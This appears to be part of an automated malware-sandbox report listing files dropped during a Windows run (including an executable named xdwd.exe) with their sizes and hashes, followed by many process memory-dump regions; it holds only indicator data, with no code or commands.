                                                                                                                                          62388e869fd62de3b867b71bb104bc08055793b7af81c347ced84cb48b8fe6a9e700e3c2db0045dea11804a01290453a145ccf7cdbc2a1a5c48d223a4d3d67ed

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4vrmqhn.4l5.ps1

                                                                                                                                          Filesize

                                                                                                                                          60B

                                                                                                                                          MD5

                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                          SHA1

                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                          SHA256

                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                          SHA512

                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\xdwd.exe

                                                                                                                                          Filesize

                                                                                                                                          5.2MB

                                                                                                                                          MD5

                                                                                                                                          adc76054a5b22974290b540fca4adf19

                                                                                                                                          SHA1

                                                                                                                                          a39741c3946cda5caae31ca9711cadd64720bbe5

                                                                                                                                          SHA256

                                                                                                                                          b036f0b4078be1866cbba1b3a4d1098629668e8ce4bd0167c308f00b7d86adb7

                                                                                                                                          SHA512

                                                                                                                                          0369bee44ce5fe7c077af194fd7200e7b413cd807d8c529a69031705ada18572d808e46222aaf557110a86ab65ca437670e5ea3168d8dcac0c4222ae301be631

                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                          Filesize

                                                                                                                                          302B

                                                                                                                                          MD5

                                                                                                                                          9cd0064640224f2600ab006aacddade4

                                                                                                                                          SHA1

                                                                                                                                          2e7203f1b364a9584c93afbb7b0e7692837ad83b

                                                                                                                                          SHA256

                                                                                                                                          59f19f250911d88608abec23ff5624749f6a5e091b45d4b2e7cf3e6d8cbc9166

                                                                                                                                          SHA512

                                                                                                                                          fad555e97977d8bd0c95b43b20f6992b1c446a02ffb5651b56577999a8bd113d0b71a60a193401bcfc315cf822bc41078b7c37a53ac8df456a9a44e4f0061bb9

                                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                                                          Filesize

                                                                                                                                          412B

                                                                                                                                          MD5

                                                                                                                                          0a701c8e3a2df9712d63eaeef64fbb58

                                                                                                                                          SHA1

                                                                                                                                          e4d5add7eec4b53509e20cd2e5708b5ef1e4908c

                                                                                                                                          SHA256

                                                                                                                                          8a23af829d088b665607074333b2ee67a7ec02b80aba51e5450c6d606c8a55da

                                                                                                                                          SHA512

                                                                                                                                          263b409704f2c1055e94817a0e68fe4ae896cf172acb1a935552eba6ea90f6f6ecc5286f5f7a759c06b304f7ba4c94836a2d7e2c5832b09972b6c5a207a0862c

                                                                                                                                        • memory/404-66-0x00000219C0630000-0x00000219C065B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/404-67-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/452-79-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/452-78-0x000001E87EA90000-0x000001E87EABB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/524-328-0x00000246684F0000-0x00000246684F8000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/524-327-0x0000024668540000-0x000002466855A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          104KB

                                                                                                                                        • memory/524-325-0x0000024668500000-0x000002466851C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          112KB

                                                                                                                                        • memory/524-324-0x00000246684D0000-0x00000246684DA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/524-323-0x0000024668310000-0x00000246683C3000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          716KB

                                                                                                                                        • memory/524-322-0x00000246682F0000-0x000002466830C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          112KB

                                                                                                                                        • memory/524-330-0x0000024668530000-0x000002466853A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/524-329-0x0000024668520000-0x0000024668526000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          24KB

                                                                                                                                        • memory/524-326-0x00000246684E0000-0x00000246684EA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          40KB

                                                                                                                                        • memory/616-92-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/616-91-0x0000022C7C660000-0x0000022C7C68B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/620-58-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/620-57-0x000001F15B0F0000-0x000001F15B11B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/620-56-0x000001F15B0C0000-0x000001F15B0E4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          144KB

                                                                                                                                        • memory/680-62-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/680-61-0x0000013B0EEE0000-0x0000013B0EF0B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/968-70-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/968-69-0x000001E59C570000-0x000001E59C59B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1040-110-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1040-109-0x000001BB96860000-0x000001BB9688B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1048-94-0x00000287964C0000-0x00000287964EB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1048-95-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1180-97-0x0000021C30730000-0x0000021C3075B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1180-98-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1192-101-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1192-100-0x0000022001EB0000-0x0000022001EDB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-48-0x00007FFFE22C0000-0x00007FFFE24C9000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          2.0MB

                                                                                                                                        • memory/1224-45-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-43-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-44-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-42-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-49-0x00007FFFE0A70000-0x00007FFFE0B2D000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          756KB

                                                                                                                                        • memory/1224-47-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1224-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1252-103-0x000002CC38400000-0x000002CC3842B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1252-104-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1288-107-0x00007FFFA2350000-0x00007FFFA2360000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/1288-106-0x000001F56C170000-0x000001F56C19B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1648-0-0x00007FFFC1183000-0x00007FFFC1185000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1648-1-0x0000000000E10000-0x0000000000E18000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          32KB

                                                                                                                                        • memory/3472-16-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3472-15-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3472-14-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3472-13-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3472-12-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/3472-11-0x00000243D2F80000-0x00000243D2FA2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/3472-30-0x00007FFFC1180000-0x00007FFFC1C42000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB